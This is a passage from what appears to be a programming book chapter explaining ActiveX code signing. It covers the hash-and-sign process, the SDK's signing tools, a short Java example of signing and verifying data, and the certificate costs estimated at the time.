You need special tools to sign your code, and these are available in the ActiveX Development Kit, available from Microsoft on CD-ROM and online at the following URL:

Fully debugged, release-ready code is run through a hash function that produces a fixed-length code digest. You then encrypt this digest with your private key and combine it with your certificate file. The result is linked back into your executable file. Presto! Your digitally signed masterpiece is ready for distribution over the Internet. The tools used for code signing are listed in Table 16.1 and are available in the ActiveX SDK.

Table 16.1. Code-signing tools in the ActiveX SDK.

Filename      Description
MAKECERT.EXE  Creates a fake certificate for development purposes.
CERT2SPC.EXE  Builds a signature block from your certificate.
SIGNCODE.EXE  Links the signature block into your executable.
CHKTRUST.EXE  Verifies that code has been successfully signed.
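The hash-then-sign pipeline that these tools automate can be sketched with the standard java.security classes. The RSA key pair and SHA256withRSA algorithm below are illustrative assumptions, not what the ActiveX SDK tools actually use:

```java
import java.security.GeneralSecurityException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;

public class SignDemo {
    // The publisher generates a key pair once; the private key stays
    // secret, and the public key goes into the certificate.
    public static KeyPair newKeyPair() {
        try {
            KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
            kpg.initialize(2048);
            return kpg.generateKeyPair();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Hash the code and encrypt the digest with the private key; this
    // is what "signing" the release build amounts to.
    public static byte[] sign(PrivateKey priv, byte[] code) {
        try {
            Signature s = Signature.getInstance("SHA256withRSA");
            s.initSign(priv);
            s.update(code);
            return s.sign();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Anyone holding the public key can check that the code is both
    // unmodified and from the holder of the private key.
    public static boolean verify(PublicKey pub, byte[] code, byte[] sig) {
        try {
            Signature s = Signature.getInstance("SHA256withRSA");
            s.initVerify(pub);
            s.update(code);
            return s.verify(sig);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        KeyPair kp = newKeyPair();
        byte[] code = "release-ready executable".getBytes();
        byte[] sig = sign(kp.getPrivate(), code);
        System.out.println(verify(kp.getPublic(), code, sig));                  // true
        System.out.println(verify(kp.getPublic(), "altered".getBytes(), sig)); // false
    }
}
```

Verification succeeds only when both the code and the signature are exactly as the publisher released them; altering either one makes verify return false.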


Considering the Cash Factor

As you’ve seen, code signing is a robust system for creating trustworthy code. Users of signed code can rest assured that it comes from a known publisher and hasn’t been tampered with since it was signed. The nagging question in your mind at this point is probably, “How much does a certificate cost?” Good question!

Microsoft estimates that commercial software publishers will pay around $400 (U.S.) for the initial certificate and around $300 for an annual renewal. Certificates for individual software publishers will ring in at about $20.